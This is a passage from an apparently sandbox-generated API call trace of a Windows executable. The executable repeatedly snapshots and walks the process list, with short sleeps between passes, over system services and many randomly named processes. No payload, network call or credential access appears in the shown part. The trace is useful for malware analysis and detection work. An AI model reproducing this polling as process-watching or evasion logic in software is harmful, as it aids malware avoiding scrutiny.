lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.384] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.386] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.387] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.388] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.389] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.391] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.392] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.393] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.394] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.396] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0107.397] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0107.398] CloseHandle (hObject=0xbc) returned 1 [0107.398] Sleep (dwMilliseconds=0x12c) [0107.719] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0107.724] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.725] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.725] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.726] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.727] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.728] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.728] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.729] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.729] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.730] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.731] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.731] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.732] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.733] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.733] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.734] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.735] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.735] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.736] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.737] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.738] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.739] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.741] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.742] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.744] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.745] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.746] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.757] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.805] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.808] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.810] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.811] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.812] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.813] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.814] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.815] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.817] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.818] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.819] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.820] CloseHandle (hObject=0xc4) returned 1 [0107.820] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0107.825] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.828] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.831] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.834] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.836] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
